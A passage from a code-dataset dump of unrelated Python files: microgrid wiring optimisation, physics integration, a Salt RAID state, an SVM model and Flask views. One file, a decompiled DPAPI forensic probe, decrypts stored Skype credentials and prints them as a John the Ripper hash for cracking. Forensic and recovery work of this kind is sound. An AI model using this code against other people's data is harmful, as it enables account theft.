ConnPoles):\r\n \r\n #Pole Wiring\r\n num_poles = len(indexes_poles[:,0])\r\n goodToGo = 0\r\n for i in range(num_poles):\r\n for j in range(i):\r\n if OnOff[i,j] == 1:\r\n match = np.array([[indexes_poles[i,0],indexes_poles[i,1]],[indexes_poles[j,0],indexes_poles[j,1]]]) \r\n if goodToGo == 0:\r\n goodToGo = 1\r\n wiringMatrix = match\r\n else:\r\n wiringMatrix = np.concatenate((wiringMatrix,match),axis=1)\r\n \r\n #Plot\r\n num_match = len(wiringMatrix[0,:])\r\n fig, ax = plt.subplots()\r\n for i in range(0,num_match-1,2):\r\n j = i + 1\r\n plt.plot(wiringMatrix[:,i],wiringMatrix[:,j],color='black',linewidth=2)\r\n \r\n #Connections wiring\r\n num_conn = len(indexes_conn[:,0])\r\n for i in range(num_conn):\r\n pole = int(ConnPoles[i,0])\r\n x_s = [indexes_conn[i,0],indexes_poles[pole,0]]\r\n y_s = [indexes_conn[i,1],indexes_poles[pole,1]]\r\n plt.plot(x_s,y_s,color='green',linewidth=1)\r\n \r\n #Save and Show\r\n ax.set_aspect('equal')\r\n plotname = \"AllWiring_prob_%s_FullReliability.png\" %(str(prob))\r\n plt.savefig(plotname, dpi=600)\r\n plt.show()\r\n \r\n \r\n##=============================================================================\r\n# Plot Pole Placement Solution\r\ndef PlotPoleSolutions(OnOff,indexes_poles,indexes_conn,indexes_excl,ConnPoles):\r\n cmap = plt.cm.get_cmap('hsv', len(indexes_poles[:,0]))\r\n \r\n fig, ax = plt.subplots()\r\n for i in range(len(indexes_poles[:,0])):\r\n for j in range(len(ConnPoles[:,0])):\r\n if ConnPoles[j,0] == i:\r\n plt.scatter(indexes_conn[j, 0], indexes_conn[j, 1], s=1,c=cmap(i),marker='.')#, color=color)\r\n plt.scatter(indexes_poles[i,0],indexes_poles[i,1],s=3,c=cmap(i), marker= '^')\r\n ax.set_aspect('equal')\r\n plotname = \"SolutionPlot_prob_%s_FullReliability.png\" %(str(prob))\r\n plt.savefig(plotname, dpi=600)\r\n plt.show()\r\n\r\n fig, ax = plt.subplots()\r\n plt.scatter(indexes_excl[:,0],indexes_excl[:,1],s=1,c ='r',marker= 's')\r\n plt.scatter(indexes_poles[:,0],indexes_poles[:,1], s=1, c='b', marker='s')\r\n ax.set_aspect('equal')\r\n plotname = \"ExclusionsPlotwSolnPoles_prob_%s_FullReliability.png\" %(str(prob))\r\n plt.savefig(plotname, dpi=600)\r\n plt.show()\r\n \r\n PoleWiring(OnOff, indexes_poles)\r\n\r\n AllWiringPlot(OnOff, indexes_poles, indexes_conn, ConnPoles) \r\n\r\n##=============================================================================\r\n\r\n#==============================================================================\r\n# Calculate Closest Pole to POI (point of interconnection) to generation\r\ndef POI_Pole(lat_Generation,long_Generation,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles):\r\n EW_dis = GPStoDistance(Lat_exc_min,Lat_exc_min,Long_exc_min,long_Generation)\r\n NS_dis = GPStoDistance(Lat_exc_min,lat_Generation,Long_exc_min,Long_exc_min)\r\n EW_index = int(EW_dis/d_EW_between)\r\n NS_index = int(NS_dis/d_NS_between)\r\n indexes_gen = [EW_index,NS_index]\r\n #Calculate distances between generation and pole\r\n #Individually feed in each pair\r\n num_poles = len(indexes_poles[:,0])\r\n Distance_Gen_Poles = np.zeros(num_poles) \r\n for i in range(num_poles):\r\n Distance = DistanceBWindexes(indexes_gen,indexes_poles[i,:],d_EW_between,d_NS_between) #Type error: only size-1 arrays can be converted to Python Scalars\r\n Distance_Gen_Poles[i] = Distance\r\n closest_pole = np.argmin(Distance_Gen_Poles)\r\n \r\n return closest_pole\r\n#==============================================================================\r\n\r\n#==============================================================================\r\n# Calc total load on poles\r\ndef PoleLoads(ConnPoles,num_poles):\r\n num_conns = len(ConnPoles[:,0])\r\n load_per_connection = kW_max/num_conns\r\n PoleLoad_matrix = np.zeros(num_poles)\r\n for i in range(num_poles):\r\n PoleLoad_matrix[i] = int(np.ceil(np.count_nonzero(ConnPoles[:,0]==i)))*load_per_connection \r\n \r\n return PoleLoad_matrix\r\n#==============================================================================\r\n \r\n#==============================================================================\r\n# Edges matrix: n-1 on line loss. |pole 1|pole 2|load loss|\r\ndef LineLosses(OnOff,ConnPoles,num_poles,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles):\r\n #Load Lat and Long Gen\r\n lat_Generation = m.radians(Net_Parameters['lat_Generation'][0])\r\n long_Generation = m.radians(Net_Parameters['long_Generation'][0])\r\n POI = POI_Pole(lat_Generation,long_Generation,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles)\r\n #Calculate load amount at each pole\r\n PoleLoad_matrix = PoleLoads(ConnPoles,num_poles)\r\n #Convert OnOff to list of edges (lines)\r\n num_edges = int(np.sum(OnOff)/2)\r\n Edges = np.zeros((num_edges,3))\r\n edge_count = 0\r\n for i in range(len(OnOff[:,0])):\r\n for j in range(i):\r\n if OnOff[i,j] == 1:\r\n OnOff_temp = np.copy(OnOff)\r\n OnOff_temp[i,j] = 0\r\n OnOff_temp[j,i] = 0\r\n #Calculate Load loss from this edge\r\n visited = np.zeros(num_poles)\r\n visited = Check_connections(POI,visited,OnOff_temp) #connected components to generation POI\r\n load_loss = 0\r\n for k in range(num_poles):\r\n if visited[k] == 0:\r\n load_loss = load_loss + PoleLoad_matrix[k]\r\n #Append Edges matrix with edge and load loss from loss of that edge (line)\r\n Edges[edge_count,:] = [i,j,load_loss]\r\n edge_count += 1\r\n return Edges\r\n#============================================================================== \r\n\r\n\r\n#==============================================================================\r\n# Internal connected components recursive. This works because undirected\r\ndef Check_connections(i,visited,OnOff):\r\n for j in range(len(OnOff[i,:])):\r\n if OnOff[i,j] == 1 and visited[j] == 0: #if j in a pole (999 is default for not a pole, and that pole is not visited)\r\n visited[j] = 1\r\n Check_connections(j,visited,OnOff)\r\n return visited\r\n#==============================================================================\r\n \r\n#==============================================================================\r\n# Connected Components Code\r\ndef ConnectedComponents(OnOff):\r\n num_poles = len(OnOff[:,0])\r\n #Check # connected components\r\n visited = np.zeros(num_poles)\r\n conn_comp = 0\r\n for i in range(num_poles):\r\n if visited[i] == 0:\r\n visited[i] = 1\r\n conn_comp += 1\r\n visited = Check_connections(i,visited,OnOff)\r\n #else if visited continue to next pole\r\n \r\n return conn_comp, visited #return visited to varify everything has been visited\r\n#==============================================================================\r\n \r\n\r\n#==============================================================================\r\n# Wiring Algorithm\r\ndef WiringAlg(ConnPoles,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min,indexes_poles,d_EW_between,d_NS_between,standalone):\r\n t0 = time.time()\r\n\r\n #Load solution pole indexes\r\n if standalone == \"True\":\r\n filename = \"indexes_poles_reformatted_%s_prob_%s_soln.csv\" %(str(reformatScaler),str(prob))\r\n indexes_poles = np.loadtxt(filename, delimiter=\",\")\r\n filename = \"d_between_%s.csv\" %str(reformatScaler)\r\n [d_EW_between,d_NS_between] = np.loadtxt(filename,delimiter=\",\")\r\n \r\n #Calculate Distances between all poles\r\n DistancesBWPoles = DistanceBWindexes(indexes_poles,indexes_poles,d_EW_between,d_NS_between)\r\n num_poles = len(indexes_poles[:,0])\r\n \r\n \r\n #Sort Distances between poles shortest connections to longest\r\n DistancesBWPoles_sorted = np.sort(DistancesBWPoles,axis=1) #First value in row will be 0, need to skip first column\r\n \r\n #Create Initial Solution\r\n goodToGo = 0\r\n num_conn_per_pole = 3 #starting value\r\n while goodToGo == 0:\r\n OnOff = np.zeros((num_poles,num_poles)) \r\n for i in range(num_poles):\r\n for j in range(1,num_conn_per_pole): #start at 1 to avoid first column of zeros. Nothing is stopping this from going over num_poles\r\n #print(\"i\")\r\n #print(i)\r\n #print(\"j\")\r\n #print(j)\r\n #print(\"*********\")\r\n ind = np.where(DistancesBWPoles == DistancesBWPoles_sorted[i,j]) #This is going to give two values, need adjust so only one half of matrix is considered\r\n #Place in use connection\r\n x = ind[0][0]\r\n y = ind[1][0]\r\n OnOff[x,y] = 1\r\n #make sure connection is also noted from the other pole's side (only will add up one side for total distances though so not double counting)\r\n OnOff[y,x] = 1\r\n # Check for islands\r\n components, visited = ConnectedComponents(OnOff) #need to make sure OnOff is being filled in way that there aren't rows of zeros \r\n if components == 1:\r\n # Calculate Load loss risk\r\n Edges = LineLosses(OnOff,ConnPoles,num_poles,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles) \r\n total_load_loss_risk = sum(Edges[:,2])\r\n Reliability_Risk_Cost = total_load_loss_risk * prob * Cost_kWh * restoration_time\r\n if Reliability_Risk_Cost == 0:\r\n #Solve for total distance and calc cost\r\n total_distance = 0\r\n for i in range(num_poles):\r\n for j in range(0,i):\r\n if OnOff[i,j] == 1:\r\n total_distance = total_distance + DistancesBWPoles[i,j]\r\n Wire_Cost = total_distance * wiring_trans_cost\r\n Best_Total_Cost = Wire_Cost+Reliability_Risk_Cost #save as current best\r\n goodToGo = 1\r\n else:\r\n num_conn_per_pole += 1\r\n else:\r\n num_conn_per_pole += 1 #This is occasionally exceeding number of poles, need to put in error fixing block\r\n Best_Reliability_Cost = np.copy(Reliability_Risk_Cost)\r\n Best_Wire_Cost = np.copy(Wire_Cost)\r\n Best_total_distance = np.copy(total_distance) \r\n \r\n #Remove connections, starting with longest working towards shortest, check to make sure not creating islands\r\n DistancesBWPoles_in_use = DistancesBWPoles_sorted[:,1:num_conn_per_pole] #truncate\r\n DistancesBWPoles_in_use = DistancesBWPoles_in_use.flatten() #flatten\r\n DistancesBWPoles_in_use = np.sort(DistancesBWPoles_in_use) #sort\r\n for k in range(len(DistancesBWPoles_in_use)-1,-1,-1):\r\n OnOff_temp = np.copy(OnOff)\r\n ind = np.where(DistancesBWPoles == DistancesBWPoles_in_use[k])\r\n x = ind[0][0]\r\n y = ind[1][0]\r\n OnOff_temp[x,y] = 0\r\n OnOff_temp[y,x] = 0 #make other matching pair 0 as well\r\n # Check for islands\r\n components, visited = ConnectedComponents(OnOff_temp)\r\n if components == 1: #no islands, Only move forward with best solution if no islands\r\n # Calculate Load loss risk\r\n Edges = LineLosses(OnOff_temp,ConnPoles,num_poles,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles)\r\n total_load_loss_risk = sum(Edges[:,2])\r\n Reliability_Risk_Cost = total_load_loss_risk * prob * Cost_kWh * restoration_time\r\n if Reliability_Risk_Cost == 0:\r\n #Solve for total distance and calc cost\r\n total_distance = 0\r\n for i in range(num_poles):\r\n for j in range(i):\r\n if OnOff_temp[i,j] == 1:\r\n total_distance = total_distance + DistancesBWPoles[i,j]\r\n Wire_Cost = total_distance * wiring_trans_cost\r\n Total_Cost = Wire_Cost+Reliability_Risk_Cost\r\n if Total_Cost < Best_Total_Cost: #Save best solution based on no islands and lowest cost\r\n OnOff = np.copy(OnOff_temp)\r\n Best_Total_Cost = np.copy(Total_Cost)\r\n Best_Reliability_Cost = np.copy(Reliability_Risk_Cost)\r\n Best_Wire_Cost = np.copy(Wire_Cost)\r\n Best_total_distance = np.copy(total_distance) \r\n #print(Best_Total_Cost)\r\n #print(Best_Reliability_Cost)\r\n #print(\"********************\")\r\n \r\n t1 = time.time()\r\n total_time = t1-t0\r\n \r\n return Best_total_distance,Best_Wire_Cost,Best_Reliability_Cost,Best_Total_Cost, OnOff, DistancesBWPoles, num_conn_per_pole, total_time\r\n \r\n#==============================================================================\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n #Set Inputs for optimizations\r\n Net_Parameters = pd.read_excel('uGrid_Input.xlsx', sheet_name = 'Net')\r\n reformatScaler = int(Net_Parameters['reformatScaler'][0]) #parameter to decrease the resolution of image (speeds up processing)\r\n exclusionBuffer = int(Net_Parameters['exclusionBuffer'][0])#meters that poles need to be form exclusions (other poles, exclusions, and connections)\r\n MaxDistancePoleConn = int(Net_Parameters['MaxDistancePoleConn'][0])#(m) the maximum distance allowed for a pole to be from a connection\r\n minPoles = int(Net_Parameters['minPoles'][0])\r\n maxPoles = int(Net_Parameters['maxPoles'][0])\r\n range_limit = int(Net_Parameters['range_limit'][0])\r\n repeats = int(Net_Parameters['repeats'][0])\r\n global prob\r\n prob = Net_Parameters['prob'][0]\r\n Cost_kWh = Net_Parameters['Cost_kWh'][0] #Change this to input from uGrid \r\n restoration_time = int(Net_Parameters['restoration_time'][0])\r\n #Load all Econ input\r\n Econ_Parameters = pd.read_excel('uGrid_Input.xlsx', sheet_name = 'Econ')\r\n wiring_trans_cost = Econ_Parameters['Cost_Trans_wire'][0]/1000 #go from per km to per m\r\n \r\n LoadKW_MAK = pd.read_excel('LoadKW_MAK.xlsx',index_col=None, header=None)\r\n global kW_max\r\n kW_max = max(LoadKW_MAK[0])\r\n \r\n #Run Pole Placement Optimization, output is saved as csv files \r\n Best_Reliability_Cost, OnOff, num_initial_clusters,ConnPole_soln, total_wire_distance_soln, total_trans_wire_distance_soln, indexes_poles_soln, totalCost_soln, indexes_conn, indexes_excl = PoleOpt(reformatScaler,minPoles,maxPoles,exclusionBuffer,range_limit,MaxDistancePoleConn,repeats,prob, Cost_kWh, wiring_trans_cost, restoration_time) \r\n PlotPoleSolutions(OnOff,indexes_poles_soln,indexes_conn,indexes_excl,ConnPole_soln)\r\n \r\n if max(ConnPole_soln[:,1]) > MaxDistancePoleConn:\r\n print(\"Distances between houses and poles is too far, the farthest is \"+str(max(ConnPole_soln[:,1]))+\"m. Increase the maximum limit for number of poles\")\r\n \r\n #Save total cost\r\n Costs = [Best_Reliability_Cost, totalCost_soln,total_wire_distance_soln, total_trans_wire_distance_soln]\r\n filename = \"Costs_reformatted_%s_prob_%s_FullReliability_soln.csv\" %(str(reformatScaler),str(prob))\r\n np.savetxt(filename,Costs, delimiter=\",\")\r\n \r\n #Run Wiring Optimization as Standalone with previous solution\r\n #total_distance, OnOff, DistancesBWPoles, num_conn_per_pole, total_time = WiringAlg(ConnPoles,Long_exc_min,Lat_exc_min,indexes_poles,d_EW_between,d_NS_between,\"True\")\r\n\r\n\r\n \r\n","sub_path":"uGridNet/Reliability/uGrid_Net_FullReliability.py","file_name":"uGrid_Net_FullReliability.py","file_ext":"py","file_size_in_byte":40543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343087868","text":"#-*- coding: utf-8 -*-\nimport numpy as np\nfrom scipy import integrate\nimport tqdm\nimport numba \nimport multiprocessing as mp\n\n@numba.jit(nopython=True)\ndef e(x, y, z, t1, t2, t4):\n return 2 * (t1 * (np.cos(x) + np.cos(y) + np.cos(z)) + t4 * (np.cos(2 * x) + np.cos(2 * y) + np.cos(2 * z)) \n + 2 * t2 * (np.cos(x) * np.cos(y) + np.cos(z) * np.cos(x) + np.cos(y) * np.cos(z)))\n@numba.jit(nopython=True)\ndef g0_real(x, y, z, t1, t2, t4, wn, sigma, mu):\n return (mu - e(x, y, z, t1, t2, t4) - sigma.real) / ((mu - e(x, y, z, t1, t2, t4) - sigma.real) ** 2 + (-wn + sigma.imag) ** 2)\n@numba.jit(nopython=True)\ndef g0_imag(x, y, z, t1, t2, t4, wn, sigma, mu):\n return (-wn + sigma.imag) / ((mu - e(x, y, z, t1, t2, t4) - sigma.real) ** 2 + (-wn + sigma.imag) ** 2)\n\ndef f(funcs, args, x, opt, _dict, k): \n return _integrate(funcs, args, x, opt, _dict, k)\n\ndef _integrate(funcs, args, x, opt, _dict, k):\n real = integrate.nquad(funcs[0], [x] * 3, args=args, opts=opt)\n imag = integrate.nquad(funcs[1], [x] * 3, args=args, opts=opt)\n _dict[k] = real[0] + 1j * imag[0]\n return _dict\n\ndef g_imp(t1, t2, t4, wn, num_iw, sigma=0, mu=0, limit=50):\n g0 = np.zeros(num_iw, dtype=np.complex64)\n if type(sigma) == int:\n sigma = np.zeros(num_iw, dtype=np.complex64)\n V = 8 * np.pi**3\n opt = {'limit' : limit, 'epsrel' : 1e-8, 'epsabs' : 1e-8}\n x = [-np.pi, np.pi]\n m = mp.Manager()\n _dict = m.dict()\n p = [mp.Process(target=f, args=([g0_real, g0_imag], (t1, t2, t4, wn[k], sigma[k], mu), x, opt, _dict, k)) for k in range(mp.cpu_count() - 1)]\n for i in p:\n i.start()\n while k < num_iw:\n for i in range(mp.cpu_count() - 1):\n if not p[i].is_alive() and k < num_iw:\n p[i] = mp.Process(target=f, args=([g0_real, g0_imag], (t1, t2, t4, wn[k], sigma[k], mu), x, opt, _dict, k))\n p[i].start()\n k += 1\n for i in p:\n i.join()\n for k in range(num_iw):\n g0[k] = _dict[k]\n return g0 / V","sub_path":"suspy/impurity_green_function.py","file_name":"impurity_green_function.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390940873","text":"# -*- coding: utf-8 -*-\n'''\nManaging software RAID with mdadm\n==================================\n\nA state module for creating or destroying software RAID devices.\n\n.. code-block:: yaml\n\n /dev/md0:\n raid.present:\n - opts: level=1 chunk=256 raid-devices=2 /dev/xvdd /dev/xvde\n'''\n\n# Import python libs\nimport logging\n\n# Import salt libs\nimport salt.utils\n\n# Set up logger\nlog = logging.getLogger(__name__)\n\n# Define the module's virtual name\n__virtualname__ = 'raid'\n\n\ndef __virtual__():\n '''\n mdadm provides raid functions for Linux\n '''\n if __grains__['kernel'] != 'Linux':\n return False\n if not salt.utils.which('mdadm'):\n return False\n return __virtualname__\n\n\ndef present(name, opts=None):\n '''\n Verify that the raid is present\n\n name\n The name of raid device to be created\n\n opts\n The mdadm options to use to create the raid. See\n :mod:`mdadm ` for more information.\n Opts can be expressed as a single string of options.\n\n .. code-block:: yaml\n\n /dev/md0:\n raid.present:\n - opts: level=1 chunk=256 raid-devices=2 /dev/xvdd /dev/xvde\n\n Or as a list of options.\n\n .. code-block:: yaml\n\n /dev/md0:\n raid.present:\n - opts:\n - level=1\n - chunk=256\n - raid-devices=2\n - /dev/xvdd\n - /dev/xvde\n '''\n ret = {'changes': {},\n 'comment': '',\n 'name': name,\n 'result': True}\n\n args = [name]\n if isinstance(opts, str):\n opts = opts.split()\n\n args.extend(opts)\n\n # Device exists\n raids = __salt__['raid.list']()\n if raids.get(name):\n ret['comment'] = 'Raid {0} already present'.format(name)\n return ret\n\n # If running with test use the test_mode with create\n if __opts__['test']:\n args.extend(['test_mode=True'])\n res = __salt__['raid.create'](*args)\n ret['comment'] = 'Raid will be created with: {0}'.format(res)\n ret['result'] = None\n return ret\n\n # Attempt to create the array\n __salt__['raid.create'](*args)\n\n raids = __salt__['raid.list']()\n changes = raids.get(name)\n if changes:\n ret['comment'] = 'Raid {0} created.'.format(name)\n ret['changes'] = changes\n else:\n ret['comment'] = 'Raid {0} failed to be created.'.format(name)\n ret['result'] = False\n\n return ret\n\n\ndef absent(name):\n '''\n Verify that the raid is absent\n\n name\n The name of raid device to be destroyed\n\n .. code-block:: yaml\n\n /dev/md0:\n raid:\n - absent\n '''\n ret = {'changes': {},\n 'comment': '',\n 'name': name,\n 'result': True}\n\n # Raid does not exist\n if name not in __salt__['raid.list']():\n ret['comment'] = 'Raid {0} already absent'.format(name)\n return ret\n elif __opts__['test']:\n ret['comment'] = 'Raid {0} is set to be destroyed'.format(name)\n ret['result'] = None\n return ret\n else:\n # Attempt to destroy raid\n ret['result'] = __salt__['raid.destroy'](name)\n\n if ret['result']:\n ret['comment'] = 'Raid {0} has been destroyed'.format(name)\n else:\n ret['comment'] = 'Raid {0} failed to be destroyed'.format(name)\n return ret\n","sub_path":"salt/states/mdadm.py","file_name":"mdadm.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"12854798","text":"\"\"\"\nFast paced game of domino'o.\n\nCopyright (c) 2015 Russell E Gibson \n\"\"\"\n\n\n# import sys\n# import pdb\n# import functools\n# import traceback\n\n\ndef _dump_sequence(level, width, items, grouping, dumper=None):\n out = ''\n for index in range(0, len(items), grouping):\n out += (level + 1) * width\n for offset in range(grouping):\n if index + offset >= len(items):\n break\n if offset % grouping != 0:\n out += ', '\n if dumper is not None:\n out += dumper(items[index + offset])\n elif hasattr(items[index + offset], 'dump'):\n out += items[index + offset].dump()\n else:\n out += str(items[index + offset])\n if index + offset + 1 < len(items):\n out += ','\n out += '\\n'\n return out\n\n\n# def enable_pdb():\n# def decorator(f):\n# @functools.wraps(f)\n# def wrapper(*args, **kwargs):\n# try:\n# return f(*args, **kwargs)\n# except:\n# info = sys.exc_info()\n# traceback.print_exception(*info) \n# pdb.post_mortem(info[2])\n# return wrapper\n# return decorator\n# \n","sub_path":"bokem/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"652127520","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/DPAPI/Probes/skype.py\n# Compiled at: 2014-09-22 08:18:41\nfrom xml import etree\nimport hashlib, struct, array, M2Crypto\nfrom DPAPI import probe\nfrom DPAPI.Core import blob\n\nclass SkypeAccount(probe.DPAPIProbe):\n\n def parse(self, data):\n self.login = None\n self.cleartext = None\n self.dpapiblob = blob.DPAPIBlob(data.remain())\n self.entropy = None\n return\n\n def preprocess(self, **k):\n self.login = k.get('login')\n tree = etree.ElementTree()\n if k.get('xmlfile') is not None:\n tree.parse(k['xmlfile'])\n else:\n tree.fromstring(k['xml'])\n self.cred = tree.find('.//Account/Credentials2')\n if self.cred is None:\n self.cred = tree.find('.//Account/Credentials3')\n if self.cred is not None:\n self.cred = self.cred.text.decode('hex')\n return\n\n def postprocess(self, **k):\n if self.cred is None:\n return\n else:\n k = hashlib.sha1(struct.pack('>L', 0) + self.dpapiblob.cleartext).digest()\n k += hashlib.sha1(struct.pack('>L', 1) + self.dpapiblob.cleartext).digest()\n ciph = M2Crypto.EVP.Cipher('aes_256_ecb', k[:32], '', M2Crypto.encrypt, 0)\n arr = array.array('B')\n arr.fromstring(self.cred)\n for i in range(0, len(self.cred), 16):\n buff = ciph.update('\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + struct.pack('>L', i >> 4))\n for j in range(min(16, len(self.cred) - i)):\n arr[(i + j)] ^= ord(buff[j])\n\n self.cleartext = arr.tostring().encode('hex')\n return\n\n def __getattr__(self, name):\n return getattr(self.dpapiblob, name)\n\n def jtr_shadow(self):\n if self.login is not None:\n return '%s:$dynamic_1401$%s' % (self.login, self.cleartext[:32])\n else:\n return ''\n\n def __repr__(self):\n s = ['Skype account']\n if self.login is not None:\n s.append(' login = %s' % self.login)\n s.append(' hash = %s' % self.cleartext[:32])\n return ('\\n').join(s)","sub_path":"pycfiles/dpapick-0.3-py2.7/skype.py","file_name":"skype.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"30561231","text":"import datatable as dt\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom h2oaicore.models import CustomModel\r\nfrom sklearn.model_selection import StratifiedKFold\r\nfrom sklearn.calibration import CalibratedClassifierCV\r\nfrom sklearn.svm import LinearSVC, LinearSVR\r\nfrom sklearn.base import BaseEstimator, ClassifierMixin\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nclass linsvc(BaseEstimator, ClassifierMixin):\r\n def __init__(self,\r\n random_state=1\r\n ): \r\n self.model=LinearSVC(penalty=\"l2\", loss=\"squared_hinge\", C=1.0,random_state=random_state)\r\n self.random_state=random_state\r\n self.classes_=[0,1]\r\n\r\n def fit(self, X, y, sample_weight=None):\r\n self.model.fit(X, y, sample_weight=sample_weight)\r\n \r\n return self\r\n\r\n def predict(self, X): #this predicts classification\r\n\r\n preds = self.model.predict(X ) \r\n return preds\r\n \r\n def predict_proba(self, X): \r\n X1=X.dot(self.model.coef_[0])\r\n return np.column_stack((np.array(X1)-1,np.array(X1) )) \r\n\r\n def set_params(self,random_state=1):\r\n self.model. set_params(random_state=random_state) \r\n \r\n def get_params(self, deep=False):\r\n return {\"random_state\":self.random_state}\r\n\r\n def get_coeff(self):\r\n return self.model.coef_[0]\r\n \r\n\r\nclass LinearSVMModel(CustomModel):\r\n \r\n _regression = True\r\n _binary = True\r\n _multiclass = False # WIP\r\n \r\n _boosters = ['linearsvm']\r\n _display_name = \"LinearSVM\"\r\n _description = \"Linear Support Vector Machine with the Liblinear method + Calibration for probabilities\"\r\n\r\n def fit(self, X, y, sample_weight=None, eval_set=None, sample_weight_eval_set=None, **kwargs):\r\n X = dt.Frame(X)\r\n\r\n orig_cols = list(X.names)\r\n\r\n if self.num_classes >= 2:\r\n mod=linsvc(random_state=self.random_state)\r\n kf=StratifiedKFold(n_splits=3, shuffle=True, random_state=self.random_state)\r\n model = CalibratedClassifierCV(base_estimator=mod, method='isotonic',cv=kf) \r\n lb = LabelEncoder()\r\n lb.fit(self.labels)\r\n y = lb.transform(y)\r\n else:\r\n model = LinearSVR(epsilon=0.0, C=1.0, loss=\"epsilon_insensitive\", random_state=self.random_state)\r\n self.means = dict()\r\n self.scaler=StandardScaler()\r\n for col in X.names:\r\n XX = X[:, col]\r\n self.means[col] = XX.mean1()\r\n if np.isnan(self.means[col]):\r\n self.means[col] = 0\r\n XX.replace(None, self.means[col])\r\n X[:, col] = XX\r\n assert X[dt.isna(dt.f[col]), col].nrows == 0\r\n X = X.to_numpy()\r\n X=self.scaler.fit_transform(X)\r\n model.fit(X, y, sample_weight=sample_weight)\r\n if self.num_classes >= 2:\r\n importances=np.array([0.0 for k in range (len(orig_cols))])\r\n for classifier in model.calibrated_classifiers_ :\r\n importances+=np.array(abs(classifier.base_estimator.get_coeff()))\r\n else :\r\n importances=np.array(abs(model.coef_[0]))\r\n \r\n \r\n self.set_model_properties(model=model,\r\n features=orig_cols,\r\n importances=importances.tolist(),#abs(model.coef_[0])\r\n iterations=0)\r\n\r\n def predict(self, X, **kwargs):\r\n X = dt.Frame(X)\r\n for col in X.names:\r\n XX = X[:, col]\r\n XX.replace(None, self.means[col])\r\n X[:, col] = XX\r\n\r\n pred_contribs = kwargs.get('pred_contribs', None)\r\n output_margin = kwargs.get('output_margin', None)\r\n\r\n model, _, _, _ = self.get_model_properties()\r\n X=X.to_numpy()\r\n X=self.scaler.transform(X)\r\n if not pred_contribs:\r\n if self.num_classes == 1:\r\n preds = model.predict(X)\r\n else:\r\n preds = model.predict_proba(X)\r\n #preds = (prob_pos - prob_pos.min()) / (prob_pos.max() - prob_pos.min())\r\n return preds\r\n else:\r\n raise NotImplementedError(\"No Shapley for SVM\")\r\n","sub_path":"models/lnrsvm.py","file_name":"lnrsvm.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"291123235","text":"# -*- coding: utf-8 -*-\nimport json\n\ndef check_float(num):\n \"\"\"\n Return True if the given number can be evaluated as float else return False\n \"\"\"\n try:\n float(num)\n return True\n except ValueError:\n return False\n\ndef create_response(data, checks, message_ok, message_error):\n \"\"\"\n Creates a HTML JSON response.\n\n Args:\n data (str):\n data to return\n checks (list):\n a list of checks that must evaluate to True\n message_ok (str):\n message to return if all checks are OK\n message_error (str):\n message to return if all checks are not OK\n\n Return:\n JSON formatted response and status code\n \"\"\"\n if all(checks):\n status_code = 200\n message = message_ok\n else:\n status_code = 500\n message = message_error\n data = None\n\n response = {'data': data,\n 'message': message}\n\n return json.dumps(response), status_code\n\ndef calculate_with_operator(left, right, operator):\n \"\"\"\n Calculates an answer for a math expression on the form\n 'left operator right'.\n\n Args:\n left/right (str):\n a string containing a valid number\n operator (str):\n a string describing the operator to use:\n add (addition)\n sub (subtraction)\n mult (multiplication)\n div (division)\n\n Return:\n Answer to the input given\n \"\"\"\n\n # Check input numbers\n if not all([check_float(num) for num in [left, right]]):\n # Error\n error = 'You must provide valid numbers!'\n return False, error\n\n # Convert to float\n left, right = [float(num) for num in [left, right]]\n\n # Perform calculation\n if operator == 'mult':\n ans = left * right\n elif operator == 'div':\n try:\n ans = left / right\n except ZeroDivisionError as e:\n error = 'Cannot divide by zero!'\n return False, error\n elif operator == 'add':\n ans = left + right\n elif operator == 'sub':\n ans = left - right\n else:\n error = 'Unknown operator!'\n return False, error\n\n # Return answer\n return True, ans\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613347042","text":"#encoding: utf-8\nfrom sqlalchemy import func\n\nimport apps.mcard.spider as mspider\nimport uuid\nfrom io import BytesIO\nfrom shortuuid import uuid\nimport flask\nfrom flask import views, Blueprint, send_file, request, make_response, render_template\nfrom apps.admin.models import PointCard\nfrom apps.front.forms import *\nfrom apps.front.models import SSC, ACD, DD, User\nfrom utils.captcha import Captcha\nfrom apps.front.decorators import *\nglobal g_captcha\nfrom apps.front.spider import *\nfrom tasks import send_mail\nfrom .score_log import consume_score_log\nimport config\nfrom utils.yiocached import mc\nfrom apps.mcard.models import MMCard, Member, RMCard\nfrom .models import StudioUser, StudioDD\nfrom utils.aliyun_sms import ali_sms\n\nbp = Blueprint('front_bp', __name__)\n\n\n@bp.route('/')\n@bp.route('/index/')\n@login_required\ndef index():\n return render_template('front/index.html')\n\n\nclass GlView(views.MethodView):\n decorators = [login_required]\n def get(self):\n user = g.user\n session[config.TOKEN] = config.TOKEN\n return 